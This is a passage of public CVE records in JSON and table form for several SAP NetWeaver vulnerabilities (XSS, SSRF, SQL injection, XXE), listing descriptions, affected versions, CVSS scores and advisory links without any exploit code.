"value": "Cross-site scripting (XSS) vulnerability in RetrieveMailExamples in SAP NetWeaver 7.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the server parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "45708",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/45708"
},
{
"name": "49266",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/49266/info"
},
{
"name": "20110819netweaver-server-xss(69331)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/69331"
},
{
"name": "http://dsecrg.com/pages/vul/show.php?id=330",
"refsource": "MISC",
"url": "http://dsecrg.com/pages/vul/show.php?id=330"
},
{
"name": "20111117 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/520551/100/0/threaded"
},
{
"name": "http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4",
"refsource": "CONFIRM",
"url": "http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-5263",
"datePublished": "2013-02-12T20:00:00",
"dateReserved": "2013-02-12T00:00:00",
"dateUpdated": "2024-08-07T00:30:46.801Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2022-28217
Vulnerability from cvelistv5
Published
2022-06-13 16:04
Modified
2024-08-03 05:48
Severity ?
EPSS score ?
Summary
Some part of SAP NetWeaver (EP Web Page Composer) does not sufficiently validate an XML document accepted from an untrusted source, which allows an adversary to exploit unprotected XML parking at endpoints, and a possibility to conduct SSRF attacks that could compromise system�s Availability by causing system to crash.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | x_refsource_MISC | |
| https://launchpad.support.sap.com/#/notes/3148377 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP SE | SAP NetWeaver (EP Web Page Composer) |
Version: 7.20 Version: 7.30 Version: 7.31 Version: 7.40 Version: 7.50 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:48:37.297Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/3148377"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "SAP NetWeaver (EP Web Page Composer)",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "7.20"
},
{
"status": "affected",
"version": "7.30"
},
{
"status": "affected",
"version": "7.31"
},
{
"status": "affected",
"version": "7.40"
},
{
"status": "affected",
"version": "7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Some part of SAP NetWeaver (EP Web Page Composer) does not sufficiently validate an XML document accepted from an untrusted source, which allows an adversary to exploit unprotected XML parking at endpoints, and a possibility to conduct SSRF attacks that could compromise system\ufffds Availability by causing system to crash."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-07-06T16:22:48",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/3148377"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2022-28217",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SAP NetWeaver (EP Web Page Composer)",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "7.20"
},
{
"version_affected": "=",
"version_value": "7.30"
},
{
"version_affected": "=",
"version_value": "7.31"
},
{
"version_affected": "=",
"version_value": "7.40"
},
{
"version_affected": "=",
"version_value": "7.50"
}
]
}
}
]
},
"vendor_name": "SAP SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Some part of SAP NetWeaver (EP Web Page Composer) does not sufficiently validate an XML document accepted from an untrusted source, which allows an adversary to exploit unprotected XML parking at endpoints, and a possibility to conduct SSRF attacks that could compromise system\ufffds Availability by causing system to crash."
}
]
},
"impact": {
"cvss": {
"baseScore": "null",
"vectorString": "null",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-918"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html",
"refsource": "MISC",
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"name": "https://launchpad.support.sap.com/#/notes/3148377",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/3148377"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2022-28217",
"datePublished": "2022-06-13T16:04:01",
"dateReserved": "2022-03-30T00:00:00",
"dateUpdated": "2024-08-03T05:48:37.297Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2020-6184
Vulnerability from cvelistv5
Published
2020-02-12 19:46
Modified
2024-08-04 08:55
Severity ?
EPSS score ?
Summary
Under certain conditions, ABAP Online Community in SAP NetWeaver (SAP_BASIS version 7.40) and SAP S/4HANA (SAP_BASIS versions 7.50, 7.51, 7.52, 7.53, 7.54), does not sufficiently encode user-controlled inputs, resulting in Reflected Cross-Site Scripting (XSS) vulnerability.
References
| ▼ | URL | Tags |
|---|---|---|
| https://launchpad.support.sap.com/#/notes/2863397 | x_refsource_MISC | |
| https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP SE | Automated Note Search Tool (SAP Basis) |
Version: < 7.0 Version: < 7.01 Version: < 7.02 Version: < 7.31 Version: < 7.4 Version: < 7.5 Version: < 7.51 Version: < 7.52 Version: < 7.53 Version: < 7.54 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T08:55:22.128Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/2863397"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Automated Note Search Tool (SAP Basis)",
"vendor": "SAP SE",
"versions": [
{
"status": "affected",
"version": "\u003c 7.0"
},
{
"status": "affected",
"version": "\u003c 7.01"
},
{
"status": "affected",
"version": "\u003c 7.02"
},
{
"status": "affected",
"version": "\u003c 7.31"
},
{
"status": "affected",
"version": "\u003c 7.4"
},
{
"status": "affected",
"version": "\u003c 7.5"
},
{
"status": "affected",
"version": "\u003c 7.51"
},
{
"status": "affected",
"version": "\u003c 7.52"
},
{
"status": "affected",
"version": "\u003c 7.53"
},
{
"status": "affected",
"version": "\u003c 7.54"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Under certain conditions, ABAP Online Community in SAP NetWeaver (SAP_BASIS version 7.40) and SAP S/4HANA (SAP_BASIS versions 7.50, 7.51, 7.52, 7.53, 7.54), does not sufficiently encode user-controlled inputs, resulting in Reflected Cross-Site Scripting (XSS) vulnerability."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Missing Authorization Check",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-02-12T19:46:26",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/2863397"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2020-6184",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Automated Note Search Tool (SAP Basis)",
"version": {
"version_data": [
{
"version_name": "\u003c",
"version_value": "7.0"
},
{
"version_name": "\u003c",
"version_value": "7.01"
},
{
"version_name": "\u003c",
"version_value": "7.02"
},
{
"version_name": "\u003c",
"version_value": "7.31"
},
{
"version_name": "\u003c",
"version_value": "7.4"
},
{
"version_name": "\u003c",
"version_value": "7.5"
},
{
"version_name": "\u003c",
"version_value": "7.51"
},
{
"version_name": "\u003c",
"version_value": "7.52"
},
{
"version_name": "\u003c",
"version_value": "7.53"
},
{
"version_name": "\u003c",
"version_value": "7.54"
}
]
}
}
]
},
"vendor_name": "SAP SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Under certain conditions, ABAP Online Community in SAP NetWeaver (SAP_BASIS version 7.40) and SAP S/4HANA (SAP_BASIS versions 7.50, 7.51, 7.52, 7.53, 7.54), does not sufficiently encode user-controlled inputs, resulting in Reflected Cross-Site Scripting (XSS) vulnerability."
}
]
},
"impact": {
"cvss": {
"baseScore": "6.1",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Missing Authorization Check"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://launchpad.support.sap.com/#/notes/2863397",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/2863397"
},
{
"name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812",
"refsource": "MISC",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=537788812"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2020-6184",
"datePublished": "2020-02-12T19:46:26",
"dateReserved": "2020-01-08T00:00:00",
"dateUpdated": "2024-08-04T08:55:22.128Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-2477
Vulnerability from cvelistv5
Published
2018-11-13 20:00
Modified
2024-08-05 04:21
Severity ?
EPSS score ?
Summary
Knowledge Management (XMLForms) in SAP NetWeaver, versions 7.30, 7.31, 7.40 and 7.50 does not sufficiently validate an XML document accepted from an untrusted source.
References
| ▼ | URL | Tags |
|---|---|---|
| https://launchpad.support.sap.com/#/notes/2661740 | x_refsource_MISC | |
| http://www.securityfocus.com/bid/105901 | vdb-entry, x_refsource_BID | |
| https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | SAP | Knowledge Management (XMLForms) in SAP NetWeaver |
Version: = 7.30 Version: = 7.31 Version: = 7.40 Version: = 7.50 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T04:21:34.098Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://launchpad.support.sap.com/#/notes/2661740"
},
{
"name": "105901",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/105901"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Knowledge Management (XMLForms) in SAP NetWeaver",
"vendor": "SAP",
"versions": [
{
"status": "affected",
"version": "= 7.30"
},
{
"status": "affected",
"version": "= 7.31"
},
{
"status": "affected",
"version": "= 7.40"
},
{
"status": "affected",
"version": "= 7.50"
}
]
}
],
"datePublic": "2018-11-13T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Knowledge Management (XMLForms) in SAP NetWeaver, versions 7.30, 7.31, 7.40 and 7.50 does not sufficiently validate an XML document accepted from an untrusted source."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Missing XML Validation",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-11-14T10:57:02",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://launchpad.support.sap.com/#/notes/2661740"
},
{
"name": "105901",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/105901"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cna@sap.com",
"ID": "CVE-2018-2477",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Knowledge Management (XMLForms) in SAP NetWeaver",
"version": {
"version_data": [
{
"version_name": "=",
"version_value": "7.30"
},
{
"version_name": "=",
"version_value": "7.31"
},
{
"version_name": "=",
"version_value": "7.40"
},
{
"version_name": "=",
"version_value": "7.50"
}
]
}
}
]
},
"vendor_name": "SAP"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Knowledge Management (XMLForms) in SAP NetWeaver, versions 7.30, 7.31, 7.40 and 7.50 does not sufficiently validate an XML document accepted from an untrusted source."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Missing XML Validation"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://launchpad.support.sap.com/#/notes/2661740",
"refsource": "MISC",
"url": "https://launchpad.support.sap.com/#/notes/2661740"
},
{
"name": "105901",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/105901"
},
{
"name": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832",
"refsource": "MISC",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=503809832"
}
]
},
"source": {
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2018-2477",
"datePublished": "2018-11-13T20:00:00",
"dateReserved": "2017-12-15T00:00:00",
"dateUpdated": "2024-08-05T04:21:34.098Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2008-1846
Vulnerability from cvelistv5
Published
2008-04-16 17:00
Modified
2024-08-07 08:40
Severity ?
EPSS score ?
Summary
The default configuration of SAP NetWeaver before 7.0 SP15 does not enable the "Always Use Secure HTML Editor" (aka Editor Security or Secure Editing) parameter, which allows remote attackers to conduct cross-site scripting (XSS) attacks by entering feedback for a file.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.aitsec.com/vulnerability-SAP-Netweaver-6.40-7.0-Cross-Site-Scripting.php | x_refsource_MISC | |
| http://www.securitytracker.com/id?1019822 | vdb-entry, x_refsource_SECTRACK | |
| http://www.securityfocus.com/bid/28699 | vdb-entry, x_refsource_BID | |
| http://www.securityfocus.com/archive/1/490625/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://securityreason.com/securityalert/3812 | third-party-advisory, x_refsource_SREASON | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/41735 | vdb-entry, x_refsource_XF |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T08:40:58.785Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.aitsec.com/vulnerability-SAP-Netweaver-6.40-7.0-Cross-Site-Scripting.php"
},
{
"name": "1019822",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1019822"
},
{
"name": "28699",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/28699"
},
{
"name": "20080409 SAP Netweaver 6.40-7.0 Cross-Site-Scripting",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/490625/100/0/threaded"
},
{
"name": "3812",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/3812"
},
{
"name": "netweaver-feedbacksform-xss(41735)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41735"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2008-04-09T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The default configuration of SAP NetWeaver before 7.0 SP15 does not enable the \"Always Use Secure HTML Editor\" (aka Editor Security or Secure Editing) parameter, which allows remote attackers to conduct cross-site scripting (XSS) attacks by entering feedback for a file."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-11T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.aitsec.com/vulnerability-SAP-Netweaver-6.40-7.0-Cross-Site-Scripting.php"
},
{
"name": "1019822",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1019822"
},
{
"name": "28699",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/28699"
},
{
"name": "20080409 SAP Netweaver 6.40-7.0 Cross-Site-Scripting",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/490625/100/0/threaded"
},
{
"name": "3812",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/3812"
},
{
"name": "netweaver-feedbacksform-xss(41735)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41735"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2008-1846",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The default configuration of SAP NetWeaver before 7.0 SP15 does not enable the \"Always Use Secure HTML Editor\" (aka Editor Security or Secure Editing) parameter, which allows remote attackers to conduct cross-site scripting (XSS) attacks by entering feedback for a file."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.aitsec.com/vulnerability-SAP-Netweaver-6.40-7.0-Cross-Site-Scripting.php",
"refsource": "MISC",
"url": "http://www.aitsec.com/vulnerability-SAP-Netweaver-6.40-7.0-Cross-Site-Scripting.php"
},
{
"name": "1019822",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1019822"
},
{
"name": "28699",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/28699"
},
{
"name": "20080409 SAP Netweaver 6.40-7.0 Cross-Site-Scripting",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/490625/100/0/threaded"
},
{
"name": "3812",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/3812"
},
{
"name": "netweaver-feedbacksform-xss(41735)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41735"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2008-1846",
"datePublished": "2008-04-16T17:00:00",
"dateReserved": "2008-04-16T00:00:00",
"dateUpdated": "2024-08-07T08:40:58.785Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-5723
Vulnerability from cvelistv5
Published
2013-09-11 14:00
Modified
2024-08-06 17:22
Severity ?
EPSS score ?
Summary
SQL injection vulnerability in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, related to "ABAD0_DELETE_DERIVATION_TABLE."
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securitytracker.com/id/1029018 | vdb-entry, x_refsource_SECTRACK | |
| https://erpscan.io/advisories/dsecrg-13-016-sap-netweaver-abad0_delete_derivation_table/ | x_refsource_MISC | |
| http://secunia.com/advisories/54702 | third-party-advisory, x_refsource_SECUNIA | |
| http://www.securityfocus.com/bid/62147 | vdb-entry, x_refsource_BID | |
| https://service.sap.com/sap/support/notes/1840249 | x_refsource_MISC | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| http://osvdb.org/96900 | vdb-entry, x_refsource_OSVDB |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:22:30.046Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1029018",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1029018"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/dsecrg-13-016-sap-netweaver-abad0_delete_derivation_table/"
},
{
"name": "54702",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/54702"
},
{
"name": "62147",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/62147"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1840249"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "96900",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/96900"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-08-30T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "SQL injection vulnerability in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, related to \"ABAD0_DELETE_DERIVATION_TABLE.\""
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-12-10T17:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "1029018",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1029018"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://erpscan.io/advisories/dsecrg-13-016-sap-netweaver-abad0_delete_derivation_table/"
},
{
"name": "54702",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/54702"
},
{
"name": "62147",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/62147"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://service.sap.com/sap/support/notes/1840249"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "96900",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/96900"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-5723",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SQL injection vulnerability in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, related to \"ABAD0_DELETE_DERIVATION_TABLE.\""
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1029018",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1029018"
},
{
"name": "https://erpscan.io/advisories/dsecrg-13-016-sap-netweaver-abad0_delete_derivation_table/",
"refsource": "MISC",
"url": "https://erpscan.io/advisories/dsecrg-13-016-sap-netweaver-abad0_delete_derivation_table/"
},
{
"name": "54702",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/54702"
},
{
"name": "62147",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/62147"
},
{
"name": "https://service.sap.com/sap/support/notes/1840249",
"refsource": "MISC",
"url": "https://service.sap.com/sap/support/notes/1840249"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "96900",
"refsource": "OSVDB",
"url": "http://osvdb.org/96900"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-5723",
"datePublished": "2013-09-11T14:00:00",
"dateReserved": "2013-09-11T00:00:00",
"dateUpdated": "2024-08-06T17:22:30.046Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2015-6662
Vulnerability from cvelistv5
Published
2015-08-24 14:00
Modified
2024-08-06 07:29
Severity ?
EPSS score ?
Summary
XML external entity (XXE) vulnerability in SAP NetWeaver Portal 7.4 allows remote attackers to read arbitrary files and possibly have other unspecified impact via crafted XML data, aka SAP Security Note 2168485.
References
| ▼ | URL | Tags |
|---|---|---|
| http://packetstormsecurity.com/files/134507/SAP-NetWeaver-7.4-XXE-Injection.html | x_refsource_MISC | |
| https://erpscan.io/advisories/erpscan-15-018-sap-netweaver-7-4-xxe/ | x_refsource_MISC | |
| http://seclists.org/fulldisclosure/2015/Nov/92 | mailing-list, x_refsource_FULLDISC | |
| http://www.securityfocus.com/archive/1/536957/100/0/threaded | mailing-list, x_refsource_BUGTRAQ |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T07:29:24.276Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/134507/SAP-NetWeaver-7.4-XXE-Injection.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://erpscan.io/advisories/erpscan-15-018-sap-netweaver-7-4-xxe/"
},
{
"name": "20151124 [ERPSCAN-15-018] SAP NetWeaver 7.4 - XXE",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2015/Nov/92"
},
{
"name": "20151123 [ERPSCAN-15-018] SAP NetWeaver 7.4 - XXE",
"tags": [
"mailing-list",
